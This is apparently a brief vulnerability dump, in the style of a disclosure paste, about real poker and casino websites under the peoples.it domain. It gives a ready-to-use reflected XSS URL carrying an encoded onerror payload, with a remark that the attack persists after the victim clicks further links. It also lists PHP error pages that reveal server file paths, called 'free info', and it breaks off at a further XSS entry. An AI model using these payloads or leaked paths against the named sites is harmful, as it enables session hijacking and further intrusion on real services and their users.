XSS (this one will also work after that the victim clicks on any link of the page) http://casino.peoples.it/?homeRealm=http://www.kpoker.it/&s=%22%3E%3Cvideo%20src=1%20onerror=alert%28String.fromCharCode%28112,97,115,115,101,100%29%29%20%3Ehttp://www.kpoker.it/ ----- http://www.tv.peoples.it/wp-content/themes/on-demand/ Fatal error: Call to undefined function get_header() in /var/www/vhosts/peoplespoker.tv/httpdocs/wp-content/themes/on-demand/index.php on line 1 ---- free info http://calendario.peoples.it/lepokerine/common/video_gallery.php?id=1 Notice: Use of undefined constant id - assumed 'id' in /var/www/vhosts/www.calendario.peoples.it/httpdocs/lepokerine/common/video_gallery.php on line 2 http://calendario.peoples.it/lepokerine/common/photo_gallery.php?id=1 Notice: Use of undefined constant id - assumed 'id' in /var/www/vhosts/www.calendario.peoples.it/httpdocs/lepokerine/common/photo_gallery.php on line 2 ---- XSS http://calendario.peo...